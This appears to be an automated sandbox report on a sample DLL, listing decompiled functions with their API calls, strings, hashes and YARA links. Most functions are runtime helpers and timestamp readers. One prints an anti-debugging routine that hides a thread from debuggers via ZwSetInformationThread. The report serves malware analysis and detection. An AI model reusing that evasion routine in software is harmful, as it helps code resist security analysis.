Opcode Fuzzy Hash: e4e449fd2582a4a912ce4590722a3fea1b530a5e0b7ff34467c0788b23f79e4c
Instruction Fuzzy Hash: EEF0C075D44208FFEB00DFE0DD4DB9DBBB8EB04301F518494FA05A6180D7745A49CB65

Uniqueness

Uniqueness Score: -1.00%

Function 10019D40, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20
libraryloaderthreadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10019D40() {
				_Unknown_base(*)()* _v8;
				struct HINSTANCE__* _v12;

				_v12 = LoadLibraryA("Ntdll.dll");
				_v8 = GetProcAddress(_v12, "ZwSetInformationThread");
				return _v8(GetCurrentThread(), 0x11, 0, 0);
			}

0x10019d51
0x10019d63
0x10019d79

APIs

LoadLibraryA.KERNEL32(Ntdll.dll,?,100206A1), ref: 10019D4B
GetProcAddress.KERNEL32(?,ZwSetInformationThread), ref: 10019D5D
GetCurrentThread.KERNEL32 ref: 10019D6C

Strings

Ntdll.dll, xrefs: 10019D46
ZwSetInformationThread, xrefs: 10019D54

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressCurrentLibraryLoadProcThread
String ID: Ntdll.dll$ZwSetInformationThread
API String ID: 903204110-1680533912
Opcode ID: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
Instruction ID: 29caf765b55be7bf21a38254d48f72174c1d944e91014696290b2e85dee50fc2
Opcode Fuzzy Hash: 68ad7e6b782c0f1e3664fc4a4fea26a1abbd1340330e0d1141474a821f8a2a15
Instruction Fuzzy Hash: 5CE0EC74940208FBFF00EBE0AD8DB9CBB78FB04702F618095FE01A6280DAB059058AB5

Uniqueness

Uniqueness Score: -1.00%

Function 1001F4A0, Relevance: 7.6, APIs: 5, Instructions: 65
registrytimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001F4A0(void* _a4, char* _a8) {
				char* _v8;
				struct _FILETIME _v12;
				void* _v16;
				struct _SYSTEMTIME _v32;
				char* _v40;
				char* _v44;
				struct _FILETIME _v52;
				char* _t43;

				_v44 = 0;
				_v40 = 0;
				_v16 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16) == 0) {
					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
						_v32.wYear = 0x7b2;
						_v32.wMonth = 1;
						_v32.wDay = 1;
						_v32.wHour = 0;
						_v32.wMinute = 0;
						_v32.wSecond = 0;
						_v32.wMilliseconds = 0;
						SystemTimeToFileTime( &_v32,  &_v52);
						_t43 = _v8;
						asm("sbb edx, [ebp-0x2c]");
						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
						_v40 = _t43;
					}
					RegCloseKey(_v16);
				}
				return _v44;
			}

0x1001f4a6
0x1001f4ad
0x1001f4b4
0x1001f4d6
0x1001f500
0x1001f502
0x1001f508
0x1001f50e
0x1001f514
0x1001f51a
0x1001f520
0x1001f526
0x1001f534
0x1001f540
0x1001f543
0x1001f554
0x1001f557
0x1001f557
0x1001f55e
0x1001f55e
0x1001f56d

APIs

RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
__aulldiv.LIBCMT ref: 1001F54F
RegCloseKey.ADVAPI32(00000000), ref: 1001F55E

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Time$CloseFileInfoOpenQuerySystem__aulldiv
String ID:
API String ID: 3147484438-0
Opcode ID: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
Instruction ID: 6ac3f46dae9d66049611ff428ba7790207c0dca18eda03b4da7369df6ee0e458
Opcode Fuzzy Hash: a8ab192541b304aa3f493e8cdc4c5a5724217b095628cd1a61777f2edf0513dd
Instruction Fuzzy Hash: 6D21FC75E10208ABEB00CFD4C898FEEB7B9FF48704F108548E514BB290D7B59A45CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 1001F3D0, Relevance: 7.6, APIs: 5, Instructions: 61
timefileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E1001F3D0(char* _a4) {
				struct _SYSTEMTIME _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _FILETIME _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				struct _FILETIME _v60;
				void* _v64;
				struct _SECURITY_ATTRIBUTES* _t44;

				_v28 = 0;
				_v24 = 0;
				if(PathFileExistsA(_a4) != 0) {
					_v64 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x2000000, 0);
					if(_v64 != 0xffffffff && GetFileTime(_v64,  &_v36,  &_v44,  &_v52) != 0) {
						_v20.wYear = 0x7b2;
						_v20.wMonth = 1;
						_v20.wDay = 1;
						_v20.wHour = 0;
						_v20.wMinute = 0;
						_v20.wSecond = 0;
						_v20.wMilliseconds = 0;
						SystemTimeToFileTime( &_v20,  &_v60);
						_t44 = _v36.dwLowDateTime - _v60.dwLowDateTime;
						asm("sbb eax, [ebp-0x34]");
						_v28 = E1000F290(_t44, _v36.dwHighDateTime, 0x2710, 0);
						_v24 = _t44;
					}
				}
				return _v28;
			}

0x1001f3d6
0x1001f3dd
0x1001f3f0
0x1001f412
0x1001f419
0x1001f435
0x1001f43b
0x1001f441
0x1001f447
0x1001f44d
0x1001f453
0x1001f459
0x1001f467
0x1001f470
0x1001f476
0x1001f487
0x1001f48a
0x1001f48a
0x1001f419
0x1001f496

APIs

PathFileExistsA.SHLWAPI(?), ref: 1001F3E8
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,02000000,00000000), ref: 1001F40C
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 1001F42B
SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F467
__aulldiv.LIBCMT ref: 1001F482

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: File$Time$CreateExistsPathSystem__aulldiv
String ID:
API String ID: 3038978132-0
Opcode ID: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
Instruction ID: 94f5442095f36b7f33c28a28e912268f677076f0b3d524be3b20220ad1e1facd
Opcode Fuzzy Hash: e720a0e6c976b777c225cc2672a2eaa0af2df3213120956698ec805836ce489b
Instruction Fuzzy Hash: 9A21E875A10208ABEB00DFD4D899FEEB7B8EF08704F108608E505BB290D775A685CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 10019330, Relevance: 7.6, APIs: 5, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10019330(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t25;
				void* _t30;
				void* _t38;
				void* _t42;
				void* _t44;
				void* _t46;

				_t38 = __edi;
				_t30 = __ebx;
				_t17 = E1000CAC0(_a4);
				_t18 = E1000CAC0(_a8);
				_t44 = _t42 + 8;
				if(_t17 >= _t18) {
					_v8 = _a4;
					_v12 = 0;
					while(1) {
						_t19 = E1000CAC0(_a8);
						_t21 = E1000CAC0(_a4);
						_t46 = _t44 + 8;
						if(_t19 + _v12 > _t21) {
							break;
						}
						_t25 = E1000E89F(_t30, _a8, _t38, _v8, _a8, E1000CAC0(_a8));
						_t44 = _t46 + 0x10;
						if(_t25 != 0) {
							_v12 = _v12 + 1;
							_v8 = _v8 + 1;
							continue;
						}
						return 1;
					}
					return 0;
				}
				return 0;
			}

0x10019330
0x10019330
0x1001933b
0x10019349
0x1001934e
0x10019353
0x1001935e
0x10019361
0x1001937c
0x10019380
0x10019391
0x10019396
0x1001939b
0x00000000
0x00000000
0x100193b2
0x100193b7
0x100193bc
0x10019370
0x10019379
0x00000000
0x10019379
0x00000000
0x100193be
0x00000000
0x100193c7
0x00000000

APIs

_strlen.LIBCMT ref: 1001933B
_strlen.LIBCMT ref: 10019349
_strlen.LIBCMT ref: 10019380
_strlen.LIBCMT ref: 10019391
_strlen.LIBCMT ref: 100193A1

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
Instruction ID: fd93541d7ed1397f6a851c7bfd43323bc4bd1343b06978e00cafc39966250b4e
Opcode Fuzzy Hash: 2e95c50b6762c7a11e15052646cc8f45d1bd71e23564d2a17366cbdfb9a5a65b
Instruction Fuzzy Hash: 571177BAE0420CE7DB10DFA8D88199E77A8DB04298F148565FD19EB345F531FF808792

Uniqueness

Uniqueness Score: -1.00%

Function 100196D0, Relevance: 7.6, APIs: 5, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100196D0(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t27;
				void* _t28;
				void* _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t36 = __edi;
				_t28 = __ebx;
				_v8 = 0;
				if(_a4 != 0 && _a8 != 0) {
					_t20 = E1000CAC0(_a4);
					_t21 = E1000CAC0(_a8);
					_t42 = _t40 + 8;
					if(_t20 >= _t21) {
						_v12 = 0;
						while(1) {
							_t23 = E1000CAC0(_a4);
							_t24 = E1000CAC0(_a8);
							_t44 = _t42 + 8;
							if(_v12 >= _t23 - _t24) {
								goto L9;
							}
							_t27 = E1000E89F(_t28, _a8, _t36, _a4 + _v12, _a8, E1000CAC0(_a8));
							_t42 = _t44 + 0x10;
							if(_t27 != 0) {
								_v12 = _v12 + 1;
								continue;
							} else {
								_v8 = 1;
							}
							goto L9;
						}
					}
				}
				L9:
				return _v8;
			}

0x100196d0
0x100196d0
0x100196d7
0x100196e2
0x100196f6
0x10019704
0x10019709
0x1001970e
0x10019710
0x10019722
0x10019726
0x10019734
0x10019739
0x10019741
0x00000000
0x00000000
0x1001975b
0x10019760
0x10019765
0x1001971f
0x00000000
0x10019767
0x10019767
0x10019767
0x00000000
0x10019765
0x10019722
0x1001970e
0x10019772
0x10019779

APIs

_strlen.LIBCMT ref: 100196F6
_strlen.LIBCMT ref: 10019704
_strlen.LIBCMT ref: 10019726
_strlen.LIBCMT ref: 10019734
_strlen.LIBCMT ref: 10019747

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
Instruction ID: 7552c70825ce5aa6cbe61f7ae5d70de39af72cecddf3b8ac3a80b57e73ca6885
Opcode Fuzzy Hash: 8611dd32ed2c8444fb0f5c1ea4afab806a2b034aeaa9f588fce8cf00fcbf311d
Instruction Fuzzy Hash: 4311ABBAD1420CEBDB14CFA4D485B9D77A4EF0428CF048165FC0A9B245E635EB84CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1000EA65, Relevance: 7.5, APIs: 5, Instructions: 39
threadCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E1000EA65(void* __ebx, void* __edi) {

				E100130A0();
				if(E100148B1(1, 0x214) != __edi) {
					_push(__esi);
					_push( *0x10332c68);
					__eax = E10013034( *0x10333820);
					__eflags = __eax;
					if(__eflags == 0) {
						_push(__esi);
						__eax = E1000CA30(__ebx, __edi, __esi, __eflags);
						goto L1;
					} else {
						_push(__edi);
						_push(__esi);
						__eax = E10013107(__ebx, __edi, __esi, __eflags);
						__eax = GetCurrentThreadId();
						__esi[1] = __esi[1] | 0xffffffff;
						 *__esi = __eax;
						0 = 1;
						__eflags = 1;
					}
				}
				return 0;
			}

0x1000ea65
0x1000ea7c
0x1000ea82
0x1000ea83
0x1000ea8f
0x1000ea97
0x1000ea99
0x1000eab2
0x1000eab3
0x00000000
0x1000ea9b
0x1000ea9b
0x1000ea9c
0x1000ea9d
0x1000eaa4
0x1000eaaa
0x1000eaae
0x1000eacc
0x1000eacc
0x1000eacc
0x1000ea99
0x1000ead1

APIs

___set_flsgetvalue.LIBCMT ref: 1000EA65

Part of subcall function 100130A0: TlsGetValue.KERNEL32(100131CA), ref: 100130A6
Part of subcall function 100130A0: __decode_pointer.LIBCMT ref: 100130B6
Part of subcall function 100130A0: TlsSetValue.KERNEL32(00000000), ref: 100130C3

__calloc_crt.LIBCMT ref: 1000EA71

Part of subcall function 100148B1: __calloc_impl.LIBCMT ref: 100148BF
Part of subcall function 100148B1: Sleep.KERNEL32(00000000,100131F0,00000001,00000214), ref: 100148D6

__decode_pointer.LIBCMT ref: 1000EA8F

Part of subcall function 10013034: TlsGetValue.KERNEL32(?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001,?,?,10330240), ref: 10013041
Part of subcall function 10013034: TlsGetValue.KERNEL32(00000005,?,100133C2,00000000,00000000,1000EAC9,00000000,?,?,00000001,?,?,1000EB2D,00000001), ref: 10013058

__initptd.LIBCMT ref: 1000EA9D

Part of subcall function 10013107: GetModuleHandleA.KERNEL32(KERNEL32.DLL,10330340,0000000C,10013219,00000000,00000000), ref: 10013118
Part of subcall function 10013107: GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10013141
Part of subcall function 10013107: GetProcAddress.KERNEL32(?,DecodePointer), ref: 10013151
Part of subcall function 10013107: InterlockedIncrement.KERNEL32(10332650), ref: 10013173
Part of subcall function 10013107: ___addlocaleref.LIBCMT ref: 1001319A

GetCurrentThreadId.KERNEL32 ref: 1000EAA4

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Value$AddressProc__decode_pointer$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref___set_flsgetvalue__calloc_crt__calloc_impl__initptd
String ID:
API String ID: 1662683381-0
Opcode ID: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
Instruction ID: d37afd26d2eadf3ef50fe9e24c1f066afac95630afcebaca695182ecfc570b21
Opcode Fuzzy Hash: 4523e30f6971cb40a2426855bbae9302a8168ff4489a0cf2ac2da806801fc158
Instruction Fuzzy Hash: 62F027373042A1ADF235F774AC4294E37C4EB8A3F1730892AF552EC0E5EE21E8808261

Uniqueness

Uniqueness Score: -1.00%

Function 1001A740, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1001A740(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				char _v279;
				char _v280;
				intOrPtr _v284;
				char _v312;
				signed int _v316;
				void* __ebp;
				void* _t27;
				intOrPtr _t52;
				void* _t55;

				_t51 = __esi;
				_t50 = __edi;
				_t37 = __ebx;
				_push(0xffffffff);
				_push(E10022AB3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_v316 = 0;
				E10001160( &_v312, __eflags, 0x10024c8f);
				_v8 = 0;
				_v280 = 0;
				E1000CF20(__edi,  &_v279, 0, 0x103);
				E1001DC00(__ebx, _t50, __esi,  &_v280);
				_t46 =  &_v280;
				_t27 = E1000CAC0( &_v280);
				_t55 = _t52 - 0x12c + 0x10;
				_t59 = _t27;
				if(_t27 == 0) {
					E1000D8A3( &_v280,  &_v280, 0x104, "unknown err");
					_t55 = _t55 + 0xc;
				}
				_v284 = E1001A480(_t37, _t46, _t50, _t51, _t59,  &_v280);
				E100011C0( &_v312, _v284);
				_push(_v284);
				E1000CA30(_t37, _t50, _t51, _t59);
				E10001110(_a4, _t59,  &_v312);
				_v316 = _v316 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v312);
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x1001a740
0x1001a740
0x1001a740
0x1001a743
0x1001a745
0x1001a750
0x1001a751
0x1001a75e
0x1001a773
0x1001a778
0x1001a77f
0x1001a794
0x1001a7a3
0x1001a7a8
0x1001a7af
0x1001a7b4
0x1001a7b7
0x1001a7b9
0x1001a7cc
0x1001a7d1
0x1001a7d1
0x1001a7e3
0x1001a7f6
0x1001a801
0x1001a802
0x1001a814
0x1001a822
0x1001a828
0x1001a835
0x1001a840
0x1001a84a

APIs

_memset.LIBCMT ref: 1001A794

Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC28
Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC45
Part of subcall function 1001DC00: _memset.LIBCMT ref: 1001DC5B
Part of subcall function 1001DC00: GetVersionExW.KERNEL32(00000114), ref: 1001DC74
Part of subcall function 1001DC00: _strcpy_s.LIBCMT ref: 1001DDA9

_strlen.LIBCMT ref: 1001A7AF
_strcpy_s.LIBCMT ref: 1001A7CC

Strings

unknown err, xrefs: 1001A7BB

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_strcpy_s$Version_strlen
String ID: unknown err
API String ID: 3541540748-813478822
Opcode ID: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
Instruction ID: 908e89cf5b9352ff889f1a9c3fa8eeef98413c65ec874cc1b061f0950b8e6722
Opcode Fuzzy Hash: dd71c00dc3e889e3b8e1fcdb10f070c2db9be79ce23929b4c0d2ec3d363c14be
Instruction Fuzzy Hash: 6F214FB5C0021CABDB28DB54DD82BD9B774EB04754F4041D4B609A7285EB74BB84CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 1001815A, Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001815A(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E1000D4F5( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E10013A1A( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E1000F720(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xa045ff98
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xa045ff98
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								__eflags = _v8;
								_t27 = _t56 + 0xac; // 0xa045ff98
								_t57 =  *_t27;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x10018162
0x10018169
0x1001817e
0x00000000
0x10018170
0x10018172
0x1001818a
0x1001818f
0x10018192
0x10018195
0x100181be
0x100181c3
0x100181c7
0x10018248
0x1001825a
0x10018263
0x10018265
0x100181a5
0x100181a5
0x100181a8
0x100181aa
0x100181ad
0x100181ad
0x100181ad
0x100181ad
0x00000000
0x100181b3
0x10018227
0x10018227
0x1001822c
0x10018232
0x10018235
0x10018237
0x1001823a
0x1001823a
0x1001823a
0x1001823a
0x00000000
0x1001823e
0x100181c9
0x100181cc
0x100181cc
0x100181d2
0x100181d5
0x100181fc
0x100181ff
0x100181ff
0x10018205
0x00000000
0x00000000
0x10018207
0x1001820a
0x00000000
0x00000000
0x1001820c
0x1001820c
0x1001820f
0x1001820f
0x10018215
0x10018183
0x10018183
0x1001821e
0x00000000
0x1001821e
0x100181d7
0x100181da
0x00000000
0x00000000
0x100181de
0x100181ec
0x100181ef
0x100181f5
0x100181f7
0x100181fa
0x00000000
0x00000000
0x00000000
0x100181fa
0x10018197
0x1001819a
0x1001819c
0x100181a2
0x100181a2
0x00000000
0x10018174
0x10018174
0x10018179
0x1001817b
0x1001817b
0x00000000
0x10018179
0x10018172

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1001818A
__isleadbyte_l.LIBCMT ref: 100181BE
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 100181EF
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,?,?,?,10016B7E,?,?,00000002), ref: 1001825D

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
Instruction ID: 8c2b7c8d3196bbd4c2d7993dcbbe5c0e1781117acee873ad45468beb87eff19f
Opcode Fuzzy Hash: 5e8ca58f192645aeac23bdabe86f34e73e76cd9a67157fe0bad94941ff89931c
Instruction Fuzzy Hash: 37318D32A04296FFEB11CFA4CC819AE7BE9FF02251F1585A9E4509F1A1D730DB81DB51

Uniqueness

Uniqueness Score: -1.00%

Function 1001A370, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A370(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				int _v12;
				short* _v16;

				_v16 = 0;
				_v12 = E1000CAC0(_a4);
				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
				_t9 = _v8 + 2; // 0x2
				_v16 = L1000CE56(__ebx, _a4, __edi, __esi, _v8 + _t9);
				_t13 = _v8 + 2; // 0x2
				E1000CF20(__edi, _v16, 0, _v8 + _t13);
				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
				_v16[_v8] = 0;
				return _v16;
			}

0x1001a376
0x1001a389
0x1001a3a2
0x1001a3a8
0x1001a3b5
0x1001a3bb
0x1001a3c6
0x1001a3e2
0x1001a3ee
0x1001a3fa

APIs

_strlen.LIBCMT ref: 1001A381
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A39C
_memset.LIBCMT ref: 1001A3C6
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3E2

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: ByteCharMultiWide$_memset_strlen
String ID:
API String ID: 745779501-0
Opcode ID: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
Instruction ID: c5e182b0f3cbb216502a88be2155e7732263ea6a521cd02f1448982d76bc71fb
Opcode Fuzzy Hash: bebd11029f934ca765ae3ad1a928e3e554420f3dbb80f1cb6d9ef85ef79db074
Instruction Fuzzy Hash: 5311B1B9E00208FBEB14CF94D895F9EB7B5EB48704F108198F9099B385D671AA018B95

Uniqueness

Uniqueness Score: -1.00%

Function 1001F570, Relevance: 6.0, APIs: 4, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1001F570() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct _SYSTEMTIME _v52;
				struct _FILETIME _v60;
				intOrPtr _t31;

				_v28.wYear = 0x7b2;
				_v28.wMonth = 1;
				_v28.wDay = 1;
				_v28.wHour = 0;
				_v28.wMinute = 0;
				_v28.wSecond = 0;
				_v28.wMilliseconds = 0;
				GetSystemTime( &_v52);
				SystemTimeToFileTime( &_v52,  &_v12);
				SystemTimeToFileTime( &_v28,  &_v60);
				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
				asm("sbb eax, [ebp-0x34]");
				_v36 = E1000F290(_t31, _v12.dwHighDateTime, 0x2710, 0);
				_v32 = _t31;
				return _v36;
			}

